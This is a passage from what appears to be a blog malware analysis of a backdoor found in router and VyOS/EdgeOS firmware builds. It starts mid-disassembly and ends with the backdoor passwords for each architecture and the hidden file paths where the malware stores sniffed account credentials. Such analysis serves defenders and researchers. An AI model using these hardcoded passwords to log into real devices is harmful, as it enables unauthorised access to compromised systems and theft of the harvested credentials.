 ││││      0x0040a314      01000224       addiu v0, zero, 1

The password and the file is the same than with Vyos/64


edgeos64  (MIPS)


Radare doesn't seem to work with this MIPS 64 file.

As a summary, the backdoor passwords are:

ARMv7 / ARMv6 = PRtest0 
Vyos / Vyos64 =  GZm7HF
Default = PRtestD
edgeos = PRtest0
edgeos64 = ??????

The files with the sniffed accounts are:

 ARMv7 / ARMv6 = /etc/X11/.pr
Vyos / Vyos64 =  '/etc/lps/lps'
Default = /etc/X11/.pr
edgeos =  '/etc/lps/lps'
edgeos64 = ???





Publicado por
Etiquetas: , ,
Subscribe to: Posts (Atom)